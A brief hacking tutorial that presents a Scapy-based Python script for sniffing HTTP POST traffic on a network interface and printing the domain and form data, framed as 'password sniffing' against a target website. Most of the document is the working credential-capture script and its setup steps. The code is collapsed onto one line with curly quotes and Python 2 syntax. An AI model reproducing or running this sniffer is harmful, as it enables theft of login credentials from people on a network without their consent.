Password Sniffing with Scapy
1. Download and install the Scapy first.
pip install scapy
2. Target Website
3. Write the Python code
from scapy.all import * def sniffer(packet): http_packet = packet if ‘POST‘ in str(http_packet): domain = str(http_packet).split("\r\n")[1].split(":")[1] data = str(http_packet).split("\r\n\r\n")[1] print "*" * 20 print "Domain: " + domain print "Data: " + data print "*" * 20 print "\n\n" sniff(iface="eth0", prn=sniffer, filter="tcp port 80")
4. Execute the Python code and visit the target website through Firefox.
Python Hacking Tools - Password Sniffing